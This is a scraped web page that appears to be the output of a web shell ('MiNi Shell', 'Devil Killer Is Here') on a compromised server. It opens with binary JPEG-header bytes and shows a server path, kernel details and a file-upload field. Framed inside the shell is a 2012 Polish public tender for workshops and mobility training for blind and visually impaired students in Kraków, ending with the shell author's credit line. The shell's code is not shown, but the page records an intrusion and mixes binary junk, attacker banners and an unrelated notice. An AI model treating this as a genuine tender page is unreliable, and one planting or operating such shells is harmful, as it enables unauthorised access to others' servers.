JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/348030-N-2012.html

<p class="kh_header"><b>Kraków: Zakup usług organizacji zajęć pozalekcyjnych w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce - warsztaty interpersonalne i psychologiczne oraz
zajęcia z orientacji przestrzennej i poruszania się</b><br>
<b>Numer ogłoszenia: 348030 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie , os. Teatralne 4a, 31-945 Kraków, woj. małopolskie, tel. 12 6442872, 501642173, faks 12 6449997.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sppsmis3.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna województwa małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług organizacji zajęć pozalekcyjnych w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce - warsztaty interpersonalne i psychologiczne oraz
zajęcia z orientacji przestrzennej i poruszania się.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania jest zorganizowanie                         i przeprowadzenie zajęć pozalekcyjnych w formie:
a.	warsztatów interpersonalnych pn. Aktywizacja potencjału osobistych możliwości - stymulacja procesów kompensacji kognitywnej,  realizowanych w ramach części I zamówienia,
b.	warsztatów psychologicznych pn. Optymalizacja poczucia tożsamości - wymiar aksjologiczny,  realizowanych w ramach części I zamówienia,
c.	warsztatów pn. Orientacja przestrzenna i poruszanie się,  realizowanych w ramach części II zamówienia

w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2   w Krakowie, w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawców, którzy dysponują co najmniej po jednej osobie dla: części I zamówienia posiadającej:  wykształcenie wyższe: mgr psychologii, ze specjalizacją psychologia defektologiczna                             oraz co najmniej 5 letnie doświadczenie zawodowe w diagnostyce i terapii psychologicznej realizowane w pracy z osobami niewidomymi i słabowidzącymi, z osobami z izolowanym defektem wzroku oraz z osobami z defektem sprzężonym (ślepota i  oligofrenia, ślepota i defekt słuchu). Osoba ta musi posiadać minimum 5 letnie doświadczenie zawodowe w nauczaniu osób z defektem wzroku, doświadczenie w realizacji zajęć warsztatowych w zakresie terapii grupowej i indywidualnej - realizacja co najmniej 300 godzin zajęć. Osoba ta musi wykazać się współpracą z Polskim Związkiem Niewidomych w zakresie prowadzenia zajęć dla osób w fazie stopniowej utraty wzroku i osób świeżoociemniałych w postaci co najmniej 100 godzin zajęć warsztatowych oraz realizacją minimum 100 godzin treningu integracyjnego na rzecz osób z defektem wzroku.
części II zamówienia posiadającej: wykształcenie wyższe pedagogiczne ze specjalnością tyflopedagogika. Osoba ta musi posiadać ukończony co najmniej kurs dla instruktorów orientacji przestrzennej i lokomocji,  w tym co najmniej 100 godzin zrealizowanych zajęć praktycznych w postaci ćwiczeń w symulatorach, co najmniej 5 letnie doświadczenie zawodowe w nauczaniu lub wychowaniu osób niewidomych i słabowidzących, doświadczenie w prowadzeniu zajęć z orientacji przestrzennej i poruszania się w postaci zrealizowanych co najmniej 100 godzin praktycznych zajęć z osobami z defektem wzroku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">szczegółowy program(opis) warsztatów, odpowiednio dla danej części            (w tym etapu)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia  w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy
2/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sppsmis3.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 102a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2012 godzina 12:00, miejsce: Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 213.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego za pośrednictwem Programu Operacyjnego Kapitał Ludzki, działanie 9.2; Projekt Systemowy Województwa Małopolskiego Modernizacja Kształcenia Zawodowego w Małopolsce.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie warsztatów interpersonalnych pn. Aktywizacja potencjału osobistych możliwości - stymulacja procesów kompensacji kognitywnej        i  warsztatów psychologicznych pn. Optymalizacja poczucia tożsamości - wymiar aksjologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty interpersonalne i psychologiczne 

Przedmiotem pierwszej części postępowania jest zorganizowanie                           i przeprowadzenie następujących zajęć pozalekcyjnych, podzielonych na dwa etapy:
a.	Etap I - warsztaty interpersonalne Aktywizacja potencjału osobistych możliwości - stymulacja procesów kompensacji kognitywnej,
b.	Etap II - warsztaty psychologiczne Optymalizacja poczucia tożsamości - wymiar aksjologiczny
oraz prowadzenie dokumentacji związanej z zajęciami dla uczniów Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2  w Krakowie w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.

Szczegółowe wymagania związane z realizacją przedmiotu zamówienia: 


Obowiązki Wykonawcy.

Wykonawca w ramach realizacji tej części zamówienia zobowiązany jest pokryć koszty organizacji zajęć (trenera zajęć), koszt pomocy dydaktycznych.

Do obowiązków Wykonawcy należy przede wszystkim:
a.	zapewnienie dostępu do odpowiedniego sprzętu i pomocy dydaktycznych, (kredki woskowe, plastelina, modelina, papier) materiały te nie będą stanowiły własności uczestników zajęć,
b.	realizacja zajęć przez wykwalifikowaną kadrę, posiadającą uprawnienia i doświadczenie w prowadzeniu zajęć z tematu objętego przedmiotową umową,
c.	realizacja zajęć w oparciu o harmonogram realizacji zamówienia, uzgodniony po podpisaniu umowy z Przedstawicielem Wykonawcy-Liderem Szkolnym,
W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników zajęć o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach  w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z wytycznymi POKL
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu każdego z etapów w ramach  realizacji części I zamówienia przeprowadzi ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 
Wykonawca po zakończeniu realizacji każdego etapu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.	listę obecności z własnoręcznymi podpisami uczestników warsztatów w każdym dniu zajęć,
b.	program zajęć oraz dziennik zajęć,
c.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem
Zaświadczenia o uczestnictwie w danych zajęciach wystawi Zamawiający.

Ramowy program zajęć:

warsztaty interpersonalne Aktywizacja potencjału osobistych możliwości - stymulacja procesów kompensacji kognitywnej

30 osób (2 grupy: 16 i 14 osób), w tym osoby niewidome                          i słabowidzące, czas trwania zajęć: 20 godzin zajęć treningowych na każdą grupę, łącznie 40 godzin, przy czym przez 1 godzinę trwania zajęć Zamawiający rozumie godzinę lekcyjną (45 minut).

Tematyka zajęć: 
a. praca z poczuciem tożsamości,
b. komunikacja interpersonalna - poziom werbalny i niewerbalny,
c. optymalizacja poziomu energetycznego,
d. techniki relaksacji: osłabianie osobistych barier i napięć,
e. trening myślenia twórczego,
f. empatia w spotkaniu ja - drugi człowiek.

warsztaty psychologiczne Optymalizacja poczucia tożsamości - wymiar aksjologiczny

30 osób (2 grupy: 16 i 14 osób), w tym osoby niewidome                    i słabowidzące, czas trwania zajęć: 20 godzin zajęć treningowych na każdą grupę, łącznie 40 godzin, przy czym przez 1 godzinę trwania zajęć Zamawiający rozumie godzinę lekcyjną (45 minut).

Tematyka zajęć:  
a. realizacja osobistego potencjału,
b. osobiste wskaźniki samorozwoju i samorealizacji,
c. osłabianie i eliminacja złogów postresowych, 
d. likwidacja barier energetycznych,
e. wspomaganie procesów zdrowia.

Program warsztatów interpersonalnych i psychologicznych ma być komplementarny z programem nauczania przedmiotu: Podstawy psychologii, socjologii i etyki w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie oraz ma być rozszerzeniem pracy wychowawczej będącej podstawą do podjęcia działań ukierunkowanych na eliminację zaburzeń intelektualnych, emocjonalnych i społecznych będących pochodnymi istniejącego defektu wzroku. 
Zajęcia realizowane w ramach części I - etap I i II muszą  odbywać się w oparciu o opracowany dla każdego z etapów przez prowadzącego PROGRAM ZAJĘĆ, załączony do oferty. 

Czas trwania zajęć:  20 godzin zajęć treningowych na każdą grupę, w każdym etapie, czyli łącznie w części pierwszej 80 godzin, przy czym przez 1 godzinę trwania zajęć Zamawiający rozumie godzinę lekcyjną (45 minut) Czas trwania zajęć maksymalnie 7 godzin dziennie z jedną półgodzinną przerwą.

Liczba uczestników zajęć:  w każdym z etapów  łącznie 30  osób, w tym osoby niewidome i słabowidzące, które w podziale na 2 grupy:  16 i 14 osób będą odbywały warsztaty w każdym z dwóch etapów.
Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.

Czas realizacji: Część I zamówienia będzie realizowana w dwóch etapach, etap I do 30 listopada 2012 r., w ramach którego do obowiązków Wykonawcy należeć będzie przeprowadzenie warsztatów interpersonalnych Aktywizacja potencjału osobistych możliwości - stymulacja procesów kompensacji kognitywnej , etap II, polegający na przeprowadzeniu warsztatów psychologicznych Optymalizacja poczucia tożsamości - wymiar aksjologiczny realizowany będzie od 3 kwietnia 2013 r. do 31 maja 2013 r.

Szczegółowy harmonogram realizacji przedmiotu zamówienia dla części pierwszej zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy.
Zajęcia powinny zostać zorganizowane w czasie wolnym od nauki szkolnej. 
Umowa będzie realizowana w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie

Zamawiający udostępnia bezpłatnie sale wykładowe w godzinach, w których nie są wykorzystywane do prowadzenia zajęć szkolnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie warsztatów pn. Orientacja przestrzenna i poruszanie się.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty orientacja przestrzenna i poruszanie się.

Przedmiotem części drugiej zamówienia jest przygotowanie              i przeprowadzenie zajęć oraz prowadzenie dokumentacji związanej             z zajęciami dla niewidomych i słabowidzących uczniów Szkoły Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie pn.: Orientacja przestrzenna i poruszanie się  w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce. Warsztaty w ramach części II będą realizowane w III etapach. 

Szczegółowe wymagania związane z realizacja przedmiotu zamówienia: 


Obowiązki Wykonawcy.

Wykonawca w ramach realizacji tej części zamówienia zobowiązany jest pokryć koszty organizacji zajęć (trenera zajęć).

Do obowiązków Wykonawcy należy przede wszystkim:
a.	zapewnienie dostępu do odpowiedniego sprzętu i narzędzi, (laski dla niewidomych) materiały te nie stanowią własności uczestników zajęć, 
b.	realizacja zajęć przez wykwalifikowaną kadrę, posiadającą uprawnienia i doświadczenie w prowadzeniu zajęć z tematu objętego przedmiotową umową,
c.	realizacja zajęć w oparciu o harmonogram realizacji zamówienia, uzgodniony po podpisaniu umowy z Przedstawicielem Wykonawcy-Liderem Szkolnym,
W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników zajęć o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach  w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z wytycznymi POKL.
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu  realizacji części II zamówienia przeprowadzi ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 
Wykonawca po zakończeniu każdego etapu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.	listę obecności z własnoręcznym podpisem uczestnika zajęć w danym dniu zajęć,
b.	program zajęć oraz dziennik zajęć,
c.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem 
Zaświadczenia o uczestnictwie w zajęciach wystawi Zamawiający.

Ramowy program zajęć: 

Zajęcia muszą się odbywać w oparciu o opracowany przez prowadzącego PROGRAM ZAJĘĆ, załączony do oferty, obejmujący niżej wymienione zagadnienia:

a.	techniki ochronne bez użycia laski, 
b.	techniki poruszania się z białą laską i/lub przewodnikiem widzącym,
c.	bezpieczne, samodzielne i skuteczne poruszanie się                      i pokonywanie tras w środowisku miejskim z wykorzystaniem publicznych środków komunikacyjnych

Czas trwania zajęć: 110 godzin praktycznych ćwiczeń z orientacji przestrzennej i poruszania się. Zajęcia mają charakter indywidualnej pracy z uczniem. Poprzez przez 1 godzinę pracy Wykonawcy Zamawiający rozumie godzinę lekcyjną  (45 minut). Ilość godzin zajęć dla jednego ucznia nie może przekraczać 3 godzin w ciągu jednego dnia. 
Liczba uczestników kursu: 10 osób niewidomych                                 i słabowidzących. Rekrutację na kurs prowadzi Zamawiający. 
Wykonawca otrzyma listę uczestników po podpisaniu umowy.
Czas realizacji: Część II zamówienia będzie realizowana w trzech etapach, etap I do 15 grudnia 2012r. w ramach którego do obowiązków Wykonawcy należeć będzie przeprowadzenie 40 godzin zajęć, etap II polegający na przeprowadzeniu 30 godzin zajęć realizowany będzie od 2 stycznia 2013r. do 27 marca 2013r., etap III polegający na przeprowadzeniu 40 godzin zajęć realizowany będzie od 3 kwietnia 2013r. do 10 czerwca 2013r.
Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy. 
Zajęcia powinny zostać zorganizowane w czasie wolnym od nauki szkolnej. 

Umowa będzie realizowana w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, ul. Królewska 86.
Ćwiczenia praktyczne realizowane będą na terenie miasta Krakowa. Zajęcia mają charakter praktycznego poznawania miasta, konkretnych tras, topografii - np. terenu dworca oraz nauki bezpiecznego korzystania ze środków komunikacji miejskiej. Trener pracuje z uczniem ucząc go orientowania się w przestrzeni, samodzielnego docierania do konkretnych miejsc pracując w mieście, przemieszczając się wraz z niewidomym pieszo i/lub środkami komunikacji miejskiej. Głównym celem w zakresie orientacji przestrzennej jest uzyskanie przez osobę niewidomą i słabowidzącą pełnej samodzielności w bezpiecznym poruszaniu się.

Ćwiczenia praktyczne należy prowadzić indywidualnie z jednym uczniem.
Zamawiający udostępnia bezpłatnie sale wykładowe w godzinach, w których nie są wykorzystywane do prowadzenia zajęć szkolnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com